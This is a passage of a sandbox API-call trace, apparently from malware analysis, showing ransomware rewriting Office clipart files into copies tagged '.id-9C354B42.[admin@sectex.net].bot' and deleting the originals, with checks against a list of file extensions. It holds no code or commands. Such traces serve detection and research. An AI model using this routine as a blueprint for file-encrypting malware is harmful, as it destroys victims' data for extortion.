	[0149.760] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0075478.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0075478.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0149.980] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=1220) returned 1
	[0149.980] CloseHandle (hObject=0x3e8) returned 1
	[0149.980] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0075478.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0075478.gif")) returned 0x20
	[0149.988] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0075478.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0075478.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.988] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0075478.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0075478.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0149.988] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.988] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.988] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0075478.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0075478.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0149.989] GetLastError () returned 0x0
	[0149.989] ReadFile (in: hFile=0x3f0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x4c4, lpOverlapped=0x0) returned 1
	[0150.024] WriteFile (in: hFile=0x2a0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x4d0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x4d0, lpOverlapped=0x0) returned 1
	[0150.024] ReadFile (in: hFile=0x3f0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0150.025] WriteFile (in: hFile=0x2a0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0150.025] SetEndOfFile (hFile=0x2a0) returned 1
	[0150.025] CloseHandle (hObject=0x2a0) returned 1
	[0150.025] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.025] SetEndOfFile (hFile=0x3f0) returned 1
	[0150.027] CloseHandle (hObject=0x3f0) returned 1
	[0150.027] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0075478.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0150.027] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0075478.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0075478.gif")) returned 1
	[0150.028] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0075478.GIF") returned 63
	[0150.028] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0075478.GIF") returned 63
	[0150.028] lstrlenW (lpString=".doc") returned 4
	[0150.028] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0150.028] lstrlenW (lpString=".docx") returned 5
	[0150.028] lstrcmpiW (lpString1=".docx", lpString2="8.GIF") returned -1
	[0150.028] lstrlenW (lpString=".pdf") returned 4
	[0150.028] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0150.028] lstrlenW (lpString=".xls") returned 4
	[0150.028] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0150.028] lstrlenW (lpString=".xlsx") returned 5
	[0150.028] lstrcmpiW (lpString1=".xlsx", lpString2="8.GIF") returned -1
	[0150.028] lstrlenW (lpString=".ppt") returned 4
	[0150.028] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0150.028] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0075478.GIF") returned 63
	[0150.028] lstrlenW (lpString=".zip") returned 4
	[0150.028] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0150.028] lstrlenW (lpString=".rar") returned 4
	[0150.028] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0150.028] lstrlenW (lpString=".bz2") returned 4
	[0150.028] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0150.028] lstrlenW (lpString=".7z") returned 3
	[0150.028] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0150.028] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0075478.GIF") returned 63
	[0150.028] lstrlenW (lpString=".dbf") returned 4
	[0150.029] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0150.029] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0075478.GIF") returned 63
	[0150.029] lstrlenW (lpString=".1cd") returned 4
	[0150.029] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0150.029] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0075478.GIF") returned 63
	[0150.029] lstrlenW (lpString=".jpg") returned 4
	[0150.029] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0150.029] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0075478.GIF") returned 63
	[0150.029] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0075478.GIF") returned 63
	[0150.029] lstrlenW (lpString=".doc") returned 4
	[0150.029] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0150.029] lstrlenW (lpString=".docx") returned 5
	[0150.029] lstrcmpiW (lpString1=".docx", lpString2="8.GIF") returned -1
	[0150.029] lstrlenW (lpString=".pdf") returned 4
	[0150.029] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0150.029] lstrlenW (lpString=".xls") returned 4
	[0150.029] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0150.029] lstrlenW (lpString=".xlsx") returned 5
	[0150.029] lstrcmpiW (lpString1=".xlsx", lpString2="8.GIF") returned -1
	[0150.029] lstrlenW (lpString=".ppt") returned 4
	[0150.029] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0150.029] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0075478.GIF") returned 63
	[0150.029] lstrlenW (lpString=".zip") returned 4
	[0150.029] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0150.029] lstrlenW (lpString=".rar") returned 4
	[0150.029] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0150.029] lstrlenW (lpString=".bz2") returned 4
	[0150.029] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0150.029] lstrlenW (lpString=".7z") returned 3
	[0150.029] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0150.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0075478.GIF") returned 63
	[0150.030] lstrlenW (lpString=".dbf") returned 4
	[0150.030] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0150.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0075478.GIF") returned 63
	[0150.030] lstrlenW (lpString=".1cd") returned 4
	[0150.030] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0150.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0075478.GIF") returned 63
	[0150.030] lstrlenW (lpString=".jpg") returned 4
	[0150.030] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0150.030] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0150.030] lstrlenW (lpString="J0086428.WMF") returned 12
	[0150.030] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086428.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086428.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0150.106] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=35346) returned 1
	[0150.106] CloseHandle (hObject=0x3dc) returned 1
	[0150.106] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086428.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086428.wmf")) returned 0x20
	[0150.124] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086428.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086428.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0150.138] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086428.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086428.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0150.193] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.193] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.193] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086428.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086428.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0150.231] GetLastError () returned 0x0
	[0150.231] ReadFile (in: hFile=0x3e8, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x8a12, lpOverlapped=0x0) returned 1
	[0150.248] WriteFile (in: hFile=0x3dc, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x8a20, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x8a20, lpOverlapped=0x0) returned 1
	[0150.250] ReadFile (in: hFile=0x3e8, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0150.250] WriteFile (in: hFile=0x3dc, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0150.250] SetEndOfFile (hFile=0x3dc) returned 1
	[0150.250] CloseHandle (hObject=0x3dc) returned 1
	[0150.250] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.250] SetEndOfFile (hFile=0x3e8) returned 1
	[0150.253] CloseHandle (hObject=0x3e8) returned 1
	[0150.253] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086428.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0150.253] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086428.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086428.wmf")) returned 1
	[0150.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086428.WMF") returned 63
	[0150.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086428.WMF") returned 63
	[0150.254] lstrlenW (lpString=".doc") returned 4
	[0150.254] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0150.254] lstrlenW (lpString=".docx") returned 5
	[0150.254] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0150.254] lstrlenW (lpString=".pdf") returned 4
	[0150.254] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0150.254] lstrlenW (lpString=".xls") returned 4
	[0150.254] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0150.254] lstrlenW (lpString=".xlsx") returned 5
	[0150.254] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0150.254] lstrlenW (lpString=".ppt") returned 4
	[0150.254] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0150.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086428.WMF") returned 63
	[0150.254] lstrlenW (lpString=".zip") returned 4
	[0150.254] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0150.254] lstrlenW (lpString=".rar") returned 4
	[0150.254] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0150.254] lstrlenW (lpString=".bz2") returned 4
	[0150.254] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0150.254] lstrlenW (lpString=".7z") returned 3
	[0150.254] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0150.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086428.WMF") returned 63
	[0150.254] lstrlenW (lpString=".dbf") returned 4
	[0150.254] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0150.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086428.WMF") returned 63
	[0150.255] lstrlenW (lpString=".1cd") returned 4
	[0150.255] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0150.255] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086428.WMF") returned 63
	[0150.255] lstrlenW (lpString=".jpg") returned 4
	[0150.255] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0150.431] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086428.WMF") returned 63
	[0150.432] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086428.WMF") returned 63
	[0150.432] lstrlenW (lpString=".doc") returned 4
	[0150.432] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0150.432] lstrlenW (lpString=".docx") returned 5
	[0150.432] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0150.432] lstrlenW (lpString=".pdf") returned 4
	[0150.432] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0150.432] lstrlenW (lpString=".xls") returned 4
	[0150.432] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0150.432] lstrlenW (lpString=".xlsx") returned 5
	[0150.432] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0150.432] lstrlenW (lpString=".ppt") returned 4
	[0150.432] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0150.432] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086428.WMF") returned 63
	[0150.432] lstrlenW (lpString=".zip") returned 4
	[0150.432] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0150.432] lstrlenW (lpString=".rar") returned 4
	[0150.432] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0150.432] lstrlenW (lpString=".bz2") returned 4
	[0150.432] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0150.432] lstrlenW (lpString=".7z") returned 3
	[0150.432] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0150.432] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086428.WMF") returned 63
	[0150.433] lstrlenW (lpString=".dbf") returned 4
	[0150.433] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0150.433] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086428.WMF") returned 63
	[0150.433] lstrlenW (lpString=".1cd") returned 4
	[0150.433] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0150.433] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086428.WMF") returned 63
	[0150.433] lstrlenW (lpString=".jpg") returned 4
	[0150.433] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0150.433] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0150.433] lstrlenW (lpString="J0090781.WMF") returned 12
	[0150.433] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090781.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090781.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0150.433] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=5314) returned 1
	[0150.434] CloseHandle (hObject=0x3d0) returned 1
	[0150.434] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090781.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090781.wmf")) returned 0x20
	[0150.434] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090781.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090781.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0150.434] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090781.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090781.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0150.434] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.434] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.434] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090781.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090781.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8
	[0150.435] GetLastError () returned 0x0
	[0150.435] ReadFile (in: hFile=0x3d0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x14c2, lpOverlapped=0x0) returned 1
	[0150.469] WriteFile (in: hFile=0x1b8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x14d0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x14d0, lpOverlapped=0x0) returned 1
	[0150.470] ReadFile (in: hFile=0x3d0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0150.470] WriteFile (in: hFile=0x1b8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0150.470] SetEndOfFile (hFile=0x1b8) returned 1
	[0150.470] CloseHandle (hObject=0x1b8) returned 1
	[0150.470] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.470] SetEndOfFile (hFile=0x3d0) returned 1
	[0150.475] CloseHandle (hObject=0x3d0) returned 1
	[0150.475] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090781.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0150.535] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090781.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090781.wmf")) returned 1
	[0150.536] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090781.WMF") returned 63
	[0150.536] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090781.WMF") returned 63
	[0150.536] lstrlenW (lpString=".doc") returned 4
	[0150.536] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0150.536] lstrlenW (lpString=".docx") returned 5
	[0150.536] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1
	[0150.536] lstrlenW (lpString=".pdf") returned 4
	[0150.536] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0150.536] lstrlenW (lpString=".xls") returned 4
	[0150.536] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0150.536] lstrlenW (lpString=".xlsx") returned 5
	[0150.536] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1
	[0150.536] lstrlenW (lpString=".ppt") returned 4
	[0150.536] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0150.536] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090781.WMF") returned 63
	[0150.536] lstrlenW (lpString=".zip") returned 4
	[0150.536] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0150.536] lstrlenW (lpString=".rar") returned 4
	[0150.536] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0150.536] lstrlenW (lpString=".bz2") returned 4
	[0150.536] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0150.536] lstrlenW (lpString=".7z") returned 3
	[0150.536] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0150.536] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090781.WMF") returned 63
	[0150.537] lstrlenW (lpString=".dbf") returned 4
	[0150.537] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0150.537] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090781.WMF") returned 63
	[0150.537] lstrlenW (lpString=".1cd") returned 4
	[0150.537] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0150.537] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090781.WMF") returned 63
	[0150.537] lstrlenW (lpString=".jpg") returned 4
	[0150.537] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0150.537] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090781.WMF") returned 63
	[0150.537] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090781.WMF") returned 63
	[0150.537] lstrlenW (lpString=".doc") returned 4
	[0150.537] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0150.537] lstrlenW (lpString=".docx") returned 5
	[0150.537] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1
	[0150.537] lstrlenW (lpString=".pdf") returned 4
	[0150.537] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0150.537] lstrlenW (lpString=".xls") returned 4
	[0150.537] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0150.537] lstrlenW (lpString=".xlsx") returned 5
	[0150.537] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1
	[0150.537] lstrlenW (lpString=".ppt") returned 4
	[0150.537] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0150.537] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090781.WMF") returned 63
	[0150.537] lstrlenW (lpString=".zip") returned 4
	[0150.537] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0150.537] lstrlenW (lpString=".rar") returned 4
	[0150.537] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0150.537] lstrlenW (lpString=".bz2") returned 4
	[0150.537] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0150.537] lstrlenW (lpString=".7z") returned 3
	[0150.538] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0150.538] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090781.WMF") returned 63
	[0150.538] lstrlenW (lpString=".dbf") returned 4
	[0150.538] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0150.538] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090781.WMF") returned 63
	[0150.538] lstrlenW (lpString=".1cd") returned 4
	[0150.538] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0150.538] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090781.WMF") returned 63
	[0150.538] lstrlenW (lpString=".jpg") returned 4
	[0150.538] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0150.538] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0150.538] lstrlenW (lpString="J0098497.WMF") returned 12
	[0150.538] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0098497.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0098497.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
